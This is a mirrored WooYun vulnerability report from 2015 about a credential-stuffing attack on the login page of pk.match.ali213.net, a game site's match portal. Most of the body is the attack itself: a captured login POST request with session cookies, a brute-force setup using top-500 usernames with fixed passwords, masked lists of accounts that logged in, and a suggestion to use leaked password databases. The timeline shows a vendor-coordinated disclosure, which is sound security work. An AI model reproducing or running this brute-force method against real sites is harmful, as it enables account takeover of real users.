乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-15: 细节已通知厂商并且等待厂商处理中 2015-07-15: 厂商已经确认,细节仅向厂商公开 2015-07-25: 细节向核心白帽子及相关领域专家公开 2015-08-04: 细节向普通白帽子公开 2015-08-14: 细节向实习白帽子公开 2015-08-29: 细节向公众公开
我想换集市的3k的购物卡,拜托给个高rank!
http://pk.match.ali213.net/login?id=1
提示可用游侠网账户登录,于是在主战论坛注册了个账号。成功登录。抓包。开始撞库。
POST /login?id=1 HTTP/1.1Host: pk.match.ali213.netProxy-Connection: keep-aliveContent-Length: 64Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://pk.match.ali213.netUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36HTTPS: 1Content-Type: application/x-www-form-urlencodedReferer: http://pk.match.ali213.net/login?id=1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: PHPSESSID=pnatk5mdvd42rbcn54vr6e57k5; zdinfo=a%3A9%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22name%22%3Bs%3A6%3A%22%E8%8B%8F%E5%AE%81%22%3Bs%3A3%3A%22pic%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22status%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22uid%22%3Bs%3A7%3A%225048685%22%3Bs%3A4%3A%22bkqz%22%3Bs%3A12%3A%22%E3%80%90%E6%B4%BB%E5%8A%A8%E3%80%91%22%3Bs%3A11%3A%22gameversion%22%3Bs%3A16%3A%22%E5%AE%9E%E5%86%B5%E8%B6%B3%E7%90%832008%22%3Bs%3A4%3A%22path%22%3Bs%3A6%3A%22suning%22%3Bs%3A5%3A%22pdate%22%3Bs%3A10%3A%221379844301%22%3B%7D; httpbor=%2Fsaichengs%3Fl%3D2%26id%3D2; CNZZDATA5464678=cnzz_eid%3D1915480331-1436940050-http%253A%252F%252Fpk.match.ali213.net%252F%26ntime%3D1436940050; CNZZDATA680195=cnzz_eid%3D2124363892-1436943884-http%253A%252F%252Fpk.match.ali213.net%252F%26ntime%3D1436943884; iLfW_98c8_noticeTitle=1; iLfW_98c8_saltkey=xeGfEG0q; iLfW_98c8_lastvisit=1436941010; iLfW_98c8_home_diymode=1; iLfW_98c8_sendmail=1; iLfW_98c8_sid=axR1y5; pgv_pvi=2462162432; pgv_info=ssi=s3193435950; Hm_lvt_2207c39aecfe7b9b0f144ab7f8316fad=1436944372; Hm_lpvt_2207c39aecfe7b9b0f144ab7f8316fad=1436944616; iLfW_98c8_seccodeSaxR1y50=d607MEyob7dn%2BYaeSjU5GDfrC2WH62r%2FilT6r7WJNHMkgKiWwZjXp0HynKEyQHLvzut%2FGuFol7ik7whHNL8; iLfW_98c8_lastact=1436944617%09forum.php%09ajaxLoginForm%5Busername%5D=§yxtest§&LoginForm%5Bpassword%5D=123456
这里我将密码统一设置位123456,用户名用top500.实际可以用泄露的数据库加密码进行撞库。效果会更好。。
302为成功登陆的!
*****ang********** 30********** 30**********xia**********ua **********a 3**********uan**********hao**********ying**********hao**********un **********ua 3**********li 3**********ei **********ng 3**********ing**********hua**********i 3**********ie **********nhua*****
500成功20,密码为123456
*****false fa********** false f********** false f********** false fa**********02 false ********** false fa**********2 false f********** false f**********2 false f**********02 false **********2 false*****
500成功20,密码为111111
危害等级:中
漏洞Rank:10
确认时间:2015-07-15 16:57
非常感谢您
暂无